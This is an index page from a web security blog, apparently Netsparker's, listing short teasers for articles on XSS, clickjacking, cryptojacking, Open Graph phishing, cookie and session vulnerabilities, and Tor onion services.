Behind the Scenes of Onion Services

Behind the Scenes of Onion Services

| | tor
In this article, we discuss how the domain name of the services in the Tor network are set and what security risks they may pose. We examine a study from Princeton University concerned with the habits of Tor users in order to determine the potential impacts of security risks. Onion ... Read More
Transforming Self-XSS Into Exploitable XSS

Transforming Self-XSS Into Exploitable XSS

Security researcher Brian Hyde was accepted into Synack Red Teams private bug bounty platform and discovered a Reflected XSS vulnerability in one of their programs. The difficulties he faced in exploiting this Cross-site Scripting (XSS) vulnerability, and the workarounds he developed during his research, are highly informative and worth investigating ... Read More
The End of CoinHive and the Rise of Cryptojacking

The End of CoinHive and the Rise of Cryptojacking

CoinHive is a service that was created in September 2017. It allows users to mine Monero cryptocurrency using JavaScript. CoinHive has remarkably changed the income models of content developers over the course of its 18 month-long adventure. However, due in large part to the drop in hash rate (over 50%) ... Read More
Sound Hijacking – Abusing Missing XFO

Sound Hijacking – Abusing Missing XFO

| | hijacking
A Clickjacking attack works by loading a malicious website inside a low-opacity iframe and overlaying it with an innocuous looking button, checkbox or link. This tricks the user into interacting with the vulnerable website beneath. The user is then forced to click the apparently safe UI element, triggering a set ... Read More
Brave Browser Sacrifices Security

Brave Browser Sacrifices Security

Brave is a new, free an open-source web browser with a built-in adblocker. It was developed by a team led by Brendan Eich, inventor of JavaScript and a former Mozilla Foundation employee. The Brave browser uses the motto, ‘You are not a product’. It focuses on improving the privacy and ... Read More
Phishing by Open Graph Protocol

Phishing by Open Graph Protocol

| | open-protocol, Phishing
The Open Graph Protocol (OGP) was introduced by Facebook approximately eight years ago to give users a way to have control over the appearance of links on social media platforms. Whenever you click the Share button on Facebook, or other social media platforms, you interact with OGP technology that makes ... Read More
Taking Remote Control of Computer Hardware

Remote Hardware Takeover via Vulnerable Admin Software

Increased digitization means that web browsers are integral to our daily lives. For example, I’m writing this article on a cloud-based word processing application, whereas a few years ago, I may only have had the option of using an executable desktop application. This growing capability means that the web will ... Read More
Cross-Domain Cookie Manipulation 1

Cross Site Cookie Manipulation

| | cookie
For years, we’ve been told to keep the values of sensitive session cookies unpredictable and complex in order to prevent attacks such as session enumeration. And, it made sense. If the session ID is complex, long and cryptographically secure, it's almost impossible for an attacker to guess it. However, from ... Read More
Stealing Data with CSS Selectors and JavaScript | Netsparker

Acquiring Data with CSS Selectors and Javascript on Time Based Attacks

jQuery is a JavaScript library that was released in August 2006 with the motto: 'write less, do more'. jQuery simplifies the process of writing code in JavaScript by making the element selectors, event chaining and handling easier. It’s safe to say that since the release of jQuery, a large number ... Read More
Two Interesting Session-Related Vulnerabilities

Two Interesting Session-Related Vulnerabilities

Sessions are an essential part of most modern web applications. This is why session-related vulnerabilities often have a sizable impact on the overall security of a web application. They frequently allow the impersonation of other users and can have other dangerous side effects. What Are Session Variables? For those not ... Read More
Loading...